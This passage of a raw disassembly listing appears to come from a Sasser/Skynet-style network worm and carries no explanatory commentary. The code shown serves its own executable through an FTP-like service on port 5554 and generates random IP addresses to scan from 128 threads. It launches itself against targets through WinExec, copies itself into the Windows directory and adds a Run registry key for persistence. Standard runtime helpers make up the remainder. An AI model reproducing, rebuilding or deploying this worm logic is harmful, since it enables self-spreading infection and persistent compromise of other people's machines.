push off_4068E0
jmp loc_401E15
; ---------------------------------------------------------------------------
loc_401CE2: ; CODE XREF: sub_401B46+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz loc_401E1A
push 0
push off_4068E4
call sub_4022B0
pop ecx
push eax
push off_4068E4
push ebx
call esi ; dword_405104
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DF7
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call dword_405108
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_40510C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DF7
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call dword_405110
cmp eax, 0FFFFFFFFh
jnz short loc_401D82
push ebx
call dword_405114
jmp short loc_401DF7
; ---------------------------------------------------------------------------
loc_401D82: ; CODE XREF: sub_401B46+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DF7
lea eax, [ebp+var_2]
push offset dword_406F48
push eax
call sub_4027C0
mov ebx, dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DCC: ; CODE XREF: sub_401B46+2A6�j
call ebx ; dword_40502C
cmp eax, 1
jnz short loc_401DEE
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; dword_405104
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DCC
; ---------------------------------------------------------------------------
loc_401DEE: ; CODE XREF: sub_401B46+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
loc_401DF7: ; CODE XREF: sub_401B46+1DD�j
; sub_401B46+21B�j ...
push [ebp+var_C]
call dword_405114
push 0
push off_4068DC
call sub_4022B0
pop ecx
push eax
push off_4068DC
loc_401E15: ; CODE XREF: sub_401B46+197�j
push [ebp+arg_0]
jmp short loc_401E50
; ---------------------------------------------------------------------------
loc_401E1A: ; CODE XREF: sub_401B46+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401E3A
push ebx
call dword_405114
jmp short loc_401E52
; ---------------------------------------------------------------------------
loc_401E3A: ; CODE XREF: sub_401B46+2E9�j
push 0
push off_4068DC
call sub_4022B0
pop ecx
push eax
push off_4068DC
loc_401E4F: ; CODE XREF: sub_401B46+8A�j
; sub_401B46+BB�j
push ebx
loc_401E50: ; CODE XREF: sub_401B46+2D2�j
call esi ; dword_405104
loc_401E52: ; CODE XREF: sub_401B46+2F2�j
cmp [ebp+var_10], 0
jg loc_401B81
push [ebp+arg_0]
call dword_405114
pop edi
pop esi
loc_401E67: ; CODE XREF: sub_401B46+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B46 endp
; =============== S U B R O U T I N E =======================================
sub_401E6E proc near ; CODE XREF: sub_401B46+119�p
; sub_401B46+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E76: ; CODE XREF: sub_401E6E+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E80
cmp al, 9
jnz short loc_401E83
loc_401E80: ; CODE XREF: sub_401E6E+C�j
inc esi
jmp short loc_401E76
; ---------------------------------------------------------------------------
loc_401E83: ; CODE XREF: sub_401E6E+10�j
; sub_401E6E+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_4028B0
test eax, eax
pop ecx
jz short loc_401E9E
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E83
; ---------------------------------------------------------------------------
loc_401E9E: ; CODE XREF: sub_401E6E+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EA3 proc near ; DATA XREF: sub_4020C8+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_40510C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EC7
loc_401EBF: ; CODE XREF: sub_401EA3+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EC7: ; CODE XREF: sub_401EA3+1A�j
push 15B2h
mov [ebp+var_14], 2
call dword_405108
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_4050F4
cmp eax, 0FFFFFFFFh
jz short loc_401EFF
push 5
push edi
call dword_4050F8
cmp eax, 0FFFFFFFFh
jnz short loc_401F08
loc_401EFF: ; CODE XREF: sub_401EA3+4C�j
push edi
call dword_405114
jmp short loc_401EBF
; ---------------------------------------------------------------------------
loc_401F08: ; CODE XREF: sub_401EA3+5A�j
; sub_401EA3+89�j
push esi
push esi
push edi
call dword_4050FC
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B46
push esi
push esi
call dword_405038 ; CreateThread
push 19h
call dword_405028 ; Sleep
jmp short loc_401F08
sub_401EA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F2E proc near ; DATA XREF: sub_4020C8+8D�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 45Ch
push ebx
mov ebx, dword_4050E0
push ebp
push esi
push edi
mov esi, 0FFh
mov ebp, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401F48: ; CODE XREF: sub_401F2E+195�j
and [esp+46Ch+var_458], 0
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8
test eax, eax
jz loc_4020BB
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call dword_405120
movsx edi, al
movsx eax, ah
test edi, edi
mov [esp+46Ch+var_45C], eax
jge short loc_401F8C
add edi, 100h
loc_401F8C: ; CODE XREF: sub_401F2E+56�j
cmp [esp+46Ch+var_45C], 0
jge short loc_401F9B
add [esp+46Ch+var_45C], 100h
loc_401F9B: ; CODE XREF: sub_401F2E+63�j
; sub_401F2E+187�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FFB
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FDE
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401FF8
; ---------------------------------------------------------------------------
loc_401FDE: ; CODE XREF: sub_401F2E+8B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_401FF8: ; CODE XREF: sub_401F2E+AE�j
push edi
jmp short loc_402027
; ---------------------------------------------------------------------------
loc_401FFB: ; CODE XREF: sub_401F2E+7B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402027: ; CODE XREF: sub_401F2E+CB�j
lea eax, [esp+47Ch+var_454]
push ebp
push eax
call ebx ; dword_4050E0
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call dword_405120
push eax
call sub_401B08
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40209E
lea eax, [esp+46Ch+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40209E
lea eax, [esp+46Ch+var_400]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [esp+46Ch+var_400]
push offset asc_406A78 ; " "
push eax
call sub_4027D0
lea eax, [esp+474h+var_454]
push eax
lea eax, [esp+478h+var_400]
push eax
call sub_4027D0
add esp, 10h
lea eax, [esp+46Ch+var_400]
push 0
push eax
call dword_40503C ; WinExec
loc_40209E: ; CODE XREF: sub_401F2E+11F�j
; sub_401F2E+12E�j
push 19h
call dword_405028 ; Sleep
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8
test eax, eax
jnz loc_401F9B
loc_4020BB: ; CODE XREF: sub_401F2E+2E�j
push 19h
call dword_405028 ; Sleep
jmp loc_401F48
sub_401F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C8 proc near ; CODE XREF: .text:004029A7�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; dword_405048
call dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_4022B0
pop ecx
test eax, eax
pop ecx
jbe short loc_402111
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40210B: ; CODE XREF: sub_4020C8+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402111: ; CODE XREF: sub_4020C8+35�j
push 1
call sub_402176
mov [esp+14h+var_14], offset aSkynetsasserve ; "SkynetSasserVersionWithPingFast"
push esi
push esi
call edi ; dword_405048
call dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402134
xor eax, eax
jmp short loc_40210B
; ---------------------------------------------------------------------------
loc_402134: ; CODE XREF: sub_4020C8+66�j
mov edi, dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EA3
push esi
push esi
call edi ; dword_405038
mov ebx, 80h
loc_40214F: ; CODE XREF: sub_4020C8+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F2E
push esi
push esi
call edi ; dword_405038
dec ebx
jnz short loc_40214F
pop ebx
loc_402162: ; CODE XREF: sub_4020C8+AC�j
push esi
call dword_40500C
push 0BB8h
call dword_405028 ; Sleep
jmp short loc_402162
sub_4020C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402176 proc near ; CODE XREF: sub_4020C8+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_4022B0
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_4021CE
lea eax, [ebp+var_424]
push offset asc_406AD4 ; "\\"
push eax
call sub_4027D0
pop ecx
pop ecx
loc_4021CE: ; CODE XREF: sub_402176+43�j
push off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_4027D0
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_4021FE
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_40504C ; CopyFileA
loc_4021FE: ; CODE XREF: sub_402176+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_405000
lea eax, [ebp+var_424]
push eax
call sub_4022B0
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405004
push [ebp+var_4]
call dword_405008
leave
retn
sub_402176 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402250 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4022A3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_402297
neg ecx
and ecx, 3
jz short loc_402279
sub edx, ecx
loc_402273: ; CODE XREF: sub_402250+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_402273
loc_402279: ; CODE XREF: sub_402250+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_402297
rep stosd
test edx, edx
jz short loc_40229D
loc_402297: ; CODE XREF: sub_402250+18�j
; sub_402250+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_402297
loc_40229D: ; CODE XREF: sub_402250+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4022A3: ; CODE XREF: sub_402250+A�j
mov eax, [esp+arg_0]
retn
sub_402250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022B0 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4022D0
loc_4022BC: ; CODE XREF: sub_4022B0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402303
test ecx, 3
jnz short loc_4022BC
add eax, 0
loc_4022D0: ; CODE XREF: sub_4022B0+A�j
; sub_4022B0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4022D0
mov eax, [ecx-4]
test al, al
jz short loc_402321
test ah, ah
jz short loc_402317
test eax, 0FF0000h
jz short loc_40230D
test eax, 0FF000000h
jz short loc_402303
jmp short loc_4022D0
; ---------------------------------------------------------------------------
loc_402303: ; CODE XREF: sub_4022B0+11�j
; sub_4022B0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40230D: ; CODE XREF: sub_4022B0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402317: ; CODE XREF: sub_4022B0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402321: ; CODE XREF: sub_4022B0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4022B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402330 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_402350
cmp edi, eax
jb loc_4024C8
loc_402350: ; CODE XREF: sub_402330+16�j
test edi, 3
jnz short loc_40236C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
loc_40236C: ; CODE XREF: sub_402330+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_402384
and eax, 3
add ecx, eax
jmp dword ptr loc_40238C+4[eax*4]
; ---------------------------------------------------------------------------
loc_402384: ; CODE XREF: sub_402330+46�j
jmp dword ptr loc_402488[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40238C: ; CODE XREF: sub_402330+31�j
; sub_402330+8E�j ...
jmp off_40240C[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov al, ds:0CC004023h
and eax, [eax+0]
lock and eax, [eax+0]
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40240C dd offset loc_40246F ; DATA XREF: sub_402330:loc_40238C�r
dd offset loc_40245C
dd offset loc_402454
dd offset loc_40244C
dd offset loc_402444
dd offset loc_40243C
dd offset loc_402434
dd offset loc_40242C
; ---------------------------------------------------------------------------
loc_40242C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402434: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40243C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_402444: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40244C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_402454: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_40245C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40246F: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330:off_40240C�o
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
off_402478 dd offset loc_402488 ; DATA XREF: sub_402330+35�r
; sub_402330+92�r ...
dd offset loc_402490
dd offset loc_40249C
dd offset loc_4024B0
; ---------------------------------------------------------------------------
loc_402488: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402490: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40249C: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4024B0: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4024C8: ; CODE XREF: sub_402330+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4024FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4024F0: ; CODE XREF: sub_402330+1B1�j
; sub_402330+208�j ...
neg ecx
jmp off_4025C0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4024FC: ; CODE XREF: sub_402330+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402514
and eax, 3
sub ecx, eax
jmp dword ptr loc_402514+4[eax*4]
; ---------------------------------------------------------------------------
loc_402514: ; CODE XREF: sub_402330+1D6�j
; DATA XREF: sub_402330+1DD�r
jmp off_402610[ecx*4]
; ---------------------------------------------------------------------------
align 4
sub ds:25480040h, ah
inc eax
add [eax+25h], dh
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4025C4
dd offset loc_4025CC
dd offset loc_4025D4
dd offset loc_4025DC
dd offset loc_4025E4
dd offset loc_4025EC
dd offset loc_4025F4
off_4025C0 dd offset loc_402607 ; DATA XREF: sub_402330+1C2�r
; ---------------------------------------------------------------------------
loc_4025C4: ; DATA XREF: sub_402330+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4025CC: ; DATA XREF: sub_402330+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4025D4: ; DATA XREF: sub_402330+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4025DC: ; DATA XREF: sub_402330+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4025E4: ; DATA XREF: sub_402330+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4025EC: ; DATA XREF: sub_402330+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4025F4: ; DATA XREF: sub_402330+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402607: ; CODE XREF: sub_402330+1C2�j
; DATA XREF: sub_402330:off_4025C0�o
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402610 dd offset loc_402620 ; DATA XREF: sub_402330+1B7�r
; sub_402330:loc_402514�r ...
dd offset loc_402628
dd offset loc_402638
dd offset loc_40264C
; ---------------------------------------------------------------------------
loc_402620: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402628: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402638: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40264C: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402670 proc near ; CODE XREF: sub_40159E+8�p
; sub_4037BC+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_402690
loc_40267C: ; CODE XREF: sub_402670+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40267C
loc_402690: ; CODE XREF: sub_402670+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_402670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026A0 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40271A
mov dh, [ecx+1]
test dh, dh
jz short loc_402707
loc_4026B8: ; CODE XREF: sub_4026A0+52�j
; sub_4026A0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4026DA
test al, al
jz short loc_4026D4
loc_4026C9: ; CODE XREF: sub_4026A0+32�j
mov al, [esi]
inc esi
loc_4026CC: ; CODE XREF: sub_4026A0+3F�j
cmp al, dl
jz short loc_4026DA
test al, al
jnz short loc_4026C9
loc_4026D4: ; CODE XREF: sub_4026A0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4026DA: ; CODE XREF: sub_4026A0+23�j
; sub_4026A0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4026CC
lea edi, [esi-1]
loc_4026E4: ; CODE XREF: sub_4026A0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402713
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4026B8
mov al, [ecx+3]
test al, al
jz short loc_402713
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4026E4
jmp short loc_4026B8
; ---------------------------------------------------------------------------
loc_402707: ; CODE XREF: sub_4026A0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402A36
; ---------------------------------------------------------------------------
loc_402713: ; CODE XREF: sub_4026A0+49�j
; sub_4026A0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_4026A0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4026A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402720 proc near ; CODE XREF: sub_401B46+103�p
; sub_401B46+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402739: ; CODE XREF: sub_402720+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402739
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_402761
mov edx, dword_406F4C
loc_402761: ; CODE XREF: sub_402720+39�j
; sub_402720+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_402781
test al, al
jz short loc_402781
inc edx
jmp short loc_402761
; ---------------------------------------------------------------------------
loc_402781: ; CODE XREF: sub_402720+58�j
; sub_402720+5C�j
mov ebx, edx
loc_402783: ; CODE XREF: sub_402720+81�j
mov al, [edx]
test al, al
jz short loc_4027A7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4027A3
inc edx
jmp short loc_402783
; ---------------------------------------------------------------------------
loc_4027A3: ; CODE XREF: sub_402720+7E�j
and byte ptr [edx], 0
inc edx
loc_4027A7: ; CODE XREF: sub_402720+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_406F4C, edx
and eax, ebx
pop ebx
leave
retn
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027C0 proc near ; CODE XREF: sub_401B46+E9�p
; sub_401B46+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402831
sub_4027C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027D0 proc near ; CODE XREF: sub_401F2E+14C�p
; sub_401F2E+15B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_4027EC
